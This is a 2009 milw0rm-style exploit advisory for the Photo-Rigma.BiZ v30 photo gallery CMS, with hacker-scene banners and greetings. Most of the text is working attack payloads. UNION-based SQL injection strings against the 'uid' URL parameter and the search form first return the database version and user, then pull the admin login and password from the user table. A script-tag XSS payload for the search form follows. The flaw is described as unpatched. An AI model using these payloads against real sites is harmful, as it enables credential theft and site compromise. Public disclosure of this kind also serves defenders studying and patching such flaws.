photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting

***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	   REMOTE SQL INJECTION (SQLi) VULNERABILITY	             	     |
|--------------------------------------------------------------------------------------------|
|                         	|      Photo-Rigma.BiZ v30     |		 	     |
|  CMS INFORMATION:		 ------------------------------			             |
|										             |
|-->WEB: http://foto.rigma.biz (affected)		     				     |
|-->DOWNLOAD: http://sourceforge.net/projects/photo-rigmabiz/ 	   		             |
|-->DEMO: http://foto.rigma.biz								     |
|-->CATEGORY: CMS / Portals								     |
|-->DESCRIPTION: Photo gallery open source project.	                                     |											     |
|-->RELEASED: 2009-04-24								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3								     |
|-->DORK: N/A										     |
|-->CATEGORY: SQL INJECTION (SQLi) / XSS						     |
|-->AFFECT VERSION: V30						     			     |
|-->Discovered Bug date: 2009-04-24							     |
|-->Reported Bug date: 2009-04-24							     |
|-->Fixed bug date: Not fixed								     |
|-->Info patch: Not fixed							             |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| SQL INJECTION  ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||




<<<<<<<<ºººººººººººººº----------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~----------ººººººººººººººº>>>>>>>>
				CONDITION: magic_quotes_gpc=off
<<<<<<<<ººººººººººººº---------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~------------ººººººººººººººº>>>>>>>>



#######################
#######################
## PROOF OF CONCEPT: ##
#######################
#######################


1.- Get var ::::: "uid":



http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*



2.- Search Post Form ::::: "poisk":



%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#



~~~---->>Return: version and database.


###############
###############
##  EXPLOIT: ##
###############
###############


1.-


http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1/*



2.-


%' AND 0 UNION ALL SELECT 1,2,3,concat(login,'<<::>>',password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM user WHERE id=1#



~~~---->>Return: login and password for user id one (admin).



    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| XSS (SEARCH)   ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||



Search Post Form --> "><script>alert('y3nh4ck3r was here!')</script>



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!



#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##       GREETZ TO: JosS and all spanish Hack3Rs community!          ##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-04-24]